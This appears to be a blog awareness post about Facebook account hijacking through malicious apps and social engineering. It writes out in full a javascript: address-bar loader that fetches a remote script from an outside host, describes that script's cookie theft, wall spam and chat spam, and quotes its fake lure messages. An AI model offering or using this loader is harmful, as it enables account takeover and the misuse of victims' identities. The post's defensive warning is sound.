Today what I am going to share is highly related to yours account security present at Facebook. As all of us know that Facebook family is increasing day by day and thus hackers mainly target Facebook accounts, since, you are not aware of many things which may happen with you at internet so you get fooled quickly by just some social engineering tricks. So all this can be termed as less amount of awareness and knowledge can lead towards a bad conclusion that is “Your Facebook Gets Hacked” which can lead towards the misuse of your Facebook id and can lead towards many bad conclusions. So, today I’ll talk majorly about three things:-
- Facebook Applications might fool you
- Your cookies can be stolen leading towards account hacking
- Many other such things can be done by just social engineering
Except these I’ll also provide an exploit which can be used to accomplish all such tasks by an hacker , as an example! I have already posted many scams updates present at Facebook which may fool you, with the passage of time. Well, at Facebook the security is just from you, every one present at in this world can make a Facebook account and can get into the developers section in order to make an application, but as you know that this world is made up of good as well as bad people so there are many security holes still present at Facebook whenever an application is made by a black hat he won’t keep in mind the safety of people he’ll just make the application for the destruction purpose and thus by using just a small java script code he can get into many others account which may use he application and follow that application guide. Now how he can get into? Whenever we will use that application and will execute that application java script in our browser our Facebook login cookies will be stolen as well as sent to the hacker and as a result he will be able to login into your account and can do what he want, like posting at your friend’s wall without your concern, harassing other users using your ID, so leading towards complete misuse of your identity and creating out problems for you. The script can be found here. The part that will grab your cookie its relatively simple. Lines 10-21 then when the hacker has your cookie, he can do anything he wants with it.Now what this script can do:-
Facebook Applications fooling you? How your cookies can be stolen at Facebook ; Heading to Social Engineering |
- It can spam at your friends’ wall the text which has been given in this script.
- Get online friends and send chat message to them what is given in Java script
- It will send the cookies of the victim towards the hacker
- Sends the proper header information along with the request
Now, all this is done under the social engineering banner of following alert statement as you can see in the coding of this java script:-
“Photo Uploaded! Please wait 1-2 minutes without leaving this page until we process your picture!'); // Stay here a little longer... please”
How is the scam going to spread by social engineering?
And as you can guess that in such a case, how will a hacker play social engineering on you, he will make an application or a website where he will do write that paste the following type {javascript:(a=(b=document).createElement('script')).src='//hackersthirst.info/com/js.js?'+Math.random(),b.body.appendChild(a);void(0)} short java script in your browser address bar to know that is your uploaded photo more popular or most popular among friends and can be many much like these other scams…etc. Here hackersthirst.info/com/js.js is the path of the real long java script. He can also change the alert statement to what he wants, and similarly he will put in the flooding section of the friends’ wall the link of the same java script hosted application of website like this:-
“Wow! Look at this i have found how much popular is my picture www.picchecket.tk”
How to: Remain safe from such attacks:-
So, you can see that how is his going to spread, thus never put the java script in the browser address bar even how much hacker, application and the fake website entices you to put that script into the browser address bar while using Facebook. So your common sense will always make you safe from such attacks.
Who emailed us this exploit?
For my introduction: My name is Nate, I have worked with many development teams but have recently gone and worked by my self in developing exploits in computers then teaching the public about them and how to avoid and stop them. I have emailed this exploit coding, as this website is trying to spread awareness among people too.
Would love to here from you...